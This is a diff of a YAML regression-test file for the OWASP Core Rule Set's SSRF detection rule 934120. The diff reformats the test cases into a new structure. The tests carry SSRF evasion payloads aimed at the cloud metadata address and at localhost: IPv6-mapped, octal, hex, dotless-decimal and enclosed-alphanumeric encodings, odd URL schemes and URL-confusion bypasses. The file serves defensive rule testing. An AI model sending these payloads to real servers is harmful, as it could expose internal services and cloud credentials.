- - test_title: 934120-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=[::ffff:a9fe:a9fe]" + version: "HTTP/1.1" + output: + no_log_contains: id "934120" + - test_id: 18 desc: SSRF - Negative tests - IPV6 Expanded stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=[0:0:0:0:0:ffff:a9fe:a9fe]" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=[0:0:0:0:0:ffff:a9fe:a9fe]" + version: "HTTP/1.1" + output: + no_log_contains: id "934120" + - test_id: 19 desc: SSRF - Negative tests - IPV6/IPV4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=[0:0:0:0:0:ffff:169.254.169.254]" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=[0:0:0:0:0:ffff:169.254.169.254]" + version: "HTTP/1.1" + output: + no_log_contains: id "934120" + - test_id: 20 desc: SSRF - Evasion technique 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http%3A%2F%2Fgoogle.com%3A80%20%26%40google.com%3A80%23%20%40127.88.23.245%3A22%2F" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http%3A%2F%2Fgoogle.com%3A80%20%26%40google.com%3A80%23%20%40127.88.23.245%3A22%2F" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 21 desc: SSRF - Weird protocol scheme 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=xri://[0:0:0:0:0:ffff:169.254.169.254]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=xri://[0:0:0:0:0:ffff:169.254.169.254]" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 22 desc: SSRF - Weird protocol scheme 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=rsync://[0:0:0:0:0:ffff:169.254.169.254]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=rsync://[0:0:0:0:0:ffff:169.254.169.254]" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 23 desc: SSRF - Enclosed alphanumerics 1 - digits stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=acap://①②⑦.⓪.⓪.①" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=acap://①②⑦.⓪.⓪.①" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 24 desc: SSRF - Enclosed alphanumerics 2 - digits stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=imap://①⑥⑨.②⑤④.①⑥⑨.②⑤④" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=imap://①⑥⑨.②⑤④.①⑥⑨.②⑤④" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 25 desc: SSRF - Enclosed alphanumerics 3 - text stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=irc://ⓛⓞⓒⓐⓛⓗⓞⓢⓣ" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=irc://ⓛⓞⓒⓐⓛⓗⓞⓢⓣ" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 26 desc: SSRF - Enclosed alphanumerics 3 - text stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=pop3://ⓁⓄⒸⒶⓁⒽⓄⓈⓉ" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=pop3://ⓁⓄⒸⒶⓁⒽⓄⓈⓉ" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 27 desc: SSRF - 8-Bit Octal conversion stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=ssh://0177.00.00.01" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=ssh://0177.00.00.01" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 28 desc: SSRF - 32-Bit Octal conversion stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=rtmp://017700000001" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=rtmp://017700000001" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 29 desc: SSRF - 32-Bit Hex conversion stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=gopher://0x7f000001" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=gopher://0x7f000001" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 30 desc: SSRF - IPv6, first byte full, rest compressed stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[a::]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[a::]" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 31 desc: SSRF - IPv6, first byte full, last byte full, rest compressed stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[a::b]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[a::b]" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 32 desc: SSRF - IPv6, compressed in the middle stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[dead:beef:dead::beef:dead:beef:dead]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-33 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[dead:beef:dead::beef:dead:beef:dead]" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 33 desc: SSRF - IPv6, link-local unicast with zone ID, compressed stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[fe80::%zone1]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-34 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[fe80::%zone1]" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 34 desc: SSRF - IPv6, link-local unicast with zone ID, full stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[fe80::dead:beef:dead:beef:dead:beef%zone1]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[fe80::dead:beef:dead:beef:dead:beef%zone1]" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 35 desc: SSRF - IPv6, IPv4 mapped stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[0:0:0:0:0:ffff:169.254.169.254]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[0:0:0:0:0:ffff:169.254.169.254]" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 36 desc: SSRF - IPv6, IPv4 compatible stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[0:0:0:0:0:0:169.254.169.254]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[0:0:0:0:0:0:169.254.169.254]" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 37 desc: SSRF - URL bypass, IP + domain stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://google.com%3A80%20%26%40127.88.23.245%3A22%2F%23%20%40google.com%3A80%2F" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://google.com%3A80%20%26%40127.88.23.245%3A22%2F%23%20%40google.com%3A80%2F" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 38 desc: SSRF - URL bypass, domain + IP stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://google.com%3A80%20%26%40google.com%3A80%23%20%40127.88.23.245%3A22%2F" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://google.com%3A80%20%26%40google.com%3A80%23%20%40127.88.23.245%3A22%2F" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 39 desc: SSRF - Enclosed alphanumerics, dots stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://169。254。169。254/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://169。254。169。254/" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 40 desc: SSRF - IPv6, the unspecified address stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[::]/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[::]/" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 41 desc: SSRF - Glibc NSS features stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: '/get?ssrf=http://\\l\\o\\c\\a\\l\\h\\o\\s\\t/' - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: '/get?ssrf=http://\\l\\o\\c\\a\\l\\h\\o\\s\\t/' + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 42 desc: SSRF - Glibc NSS features stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: '/get?ssrf=http://\\g\\o\\o\\g\\l\\e.\\c\\o\\m/' - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: '/get?ssrf=http://\\g\\o\\o\\g\\l\\e.\\c\\o\\m/' + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 43 desc: SSRF - Input variable coverage test (Dotless decimal) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Cookie: ssrf=http://2852039166/ - method: "GET" - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Cookie: http://2852039166/ - method: "GET" - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: POST - uri: "/post" - data: | - ----------397236876 - Content-Disposition: form-data; name="file"; filename="http://2852039166/?.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Cookie: ssrf=http://2852039166/ + method: "GET" + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Cookie: http://2852039166/ + method: "GET" + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: POST + uri: "/post" + data: | + ----------397236876 + Content-Disposition: form-data; name="file"; filename="http://2852039166/?.txt" + Content-Type: text/plain - My epic SSRF attempt + My epic SSRF attempt - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: id "934120" - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?http://2852039166/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://2852039166/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: application/xml - method: POST - uri: "/post" - data: "http://2852039166/" - version: 